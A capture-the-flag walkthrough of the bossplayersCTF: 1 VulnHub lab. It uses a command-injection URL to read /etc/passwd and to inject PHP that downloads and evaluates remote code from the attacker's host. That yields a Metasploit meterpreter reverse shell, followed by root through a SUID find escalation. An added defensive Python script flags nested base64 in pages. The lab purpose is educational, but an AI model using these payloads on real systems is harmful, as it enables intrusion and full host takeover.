bossplayersCTF: 1 walkthrough vulnhub CTF | bossplayersCTF: 1 Vulnhub writeup
In this article, we solve the bossplayersCTF: 1 VulnHub CTF. The goal of the lab is root account access. This VM was created by Cuong Nguyen.
You can download this VM here.
Description bossplayersCTF: 1
Aimed at Beginner Security Professionals who want to get their feet wet into doing some CTF’s. It should take around 30 minutes to root.
Let’s start by scanning the network to find our target. In my case, the IP is 192.168.1.109
Our next step is to scan the ports and services of our target machine.
nmap -A 192.168.1.109
Our Nmap scan is complete, and we see the target machine has port 22 (SSH) and port 80 (HTTP) open.
We find that port 80 is running HTTP, so we open the IP in our browser.
On the front page I didn’t see anything important, so I moved on to the next step, checking the source code of the web page, and at the end of the page I found a base64-encoded value.
echo "WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK" |base64 -d
echo "ZDI5eWEybHVaMmx1Y0hKdlozSmxjM011Y0dod0NnPT0K" |base64 -d
Decoding one last time, we see an interesting PHP file location.
echo "d29ya2luZ2lucHJvZ3Jlc3MucGhwCg==" |base64 -d
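Stacking base64 three times, as in the decode steps above, hides nothing: the layers peel off mechanically. The following added example (not part of the original walkthrough or the VM) is a check a site owner could run over their own pages before release to find encoded strings that leak file names; the function names, the 16-character threshold and the sample HTML are assumptions made for illustration.

```python
import base64
import binascii
import re

# Runs of base64 alphabet worth testing; the 16-character floor is an assumption.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
B64_FULL = re.compile(r"[A-Za-z0-9+/]+={0,2}")
MAX_LAYERS = 10  # bound the loop on pathological input


def peel_base64(token, max_layers=MAX_LAYERS):
    """Decode repeatedly while the text is still well-formed base64.

    Returns (layers_removed, final_text)."""
    text, layers = token.strip(), 0
    while layers < max_layers:
        if len(text) % 4 or not B64_FULL.fullmatch(text):
            break  # not base64 any more: this is the plaintext
        try:
            decoded = base64.b64decode(text, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            break  # decodes to binary, so treat the current text as final
        decoded = decoded.strip()  # `echo ... | base64` leaves a trailing newline
        if not decoded.isprintable():
            break
        text, layers = decoded, layers + 1
    return layers, text


def audit_html(html):
    """Return (token, layers, plaintext) for each token that decodes to text."""
    findings = []
    for token in B64_TOKEN.findall(html):
        layers, plaintext = peel_base64(token)
        if layers:
            findings.append((token, layers, plaintext))
    return findings


# Constructed sample page: the value is the one from this walkthrough; placing it
# in an HTML comment is an assumption.
SAMPLE_HTML = """<html><body>
<h1>Under construction</h1>
<!-- WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK -->
</body></html>"""

if __name__ == "__main__":
    for token, layers, plaintext in audit_html(SAMPLE_HTML):
        print(f"{layers} layer(s) of base64 -> {plaintext!r}")
```

Any finding from such a check means the page ships a recoverable secret and the referenced file should be protected or removed, not re-encoded.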
I tried to open this file in our browser. It shows a system install list and an Outstanding list, where we see the text "Test ping command".
We tried to read the passwd file using the cat command through the URL, and we see the target's passwd file, which means this URL is vulnerable to command injection.
We continue with Metasploit’s web delivery module to compromise the host machine and obtain a reverse connection.
set target 1
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.18
set lport 4545
run
This will generate malicious PHP code, which you’ll use for command execution through the web URL. I copied the malicious code, pasted it into the URL and hit enter.
http://192.168.1.109/workinginprogress.php?cmd=php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.18:8080/syOqX0Xl7'));"
We see in the terminal that a new meterpreter session is open.
After running the shell command we see a blank shell.
To spawn an interactive shell through python3, run this command:
python3 -c 'import pty;pty.spawn("/bin/bash")'
I started to enumerate the target machine, but I didn’t find any important file or directory.
cd cuong
ls -lsa
Moving on to privilege escalation: by using the following command you can enumerate all binary files that have the SUID permission set:
find / -type f -perm -u=s 2>/dev/null
We see many files, but I focused on the find command. I searched on Google and found a find command privilege escalation script.
/usr/bin/find . -exec /bin/bash -p \; -quit
I moved to the root user's home directory, and with the ls command we see our root flag.
cd /root
ls
Reading root Flag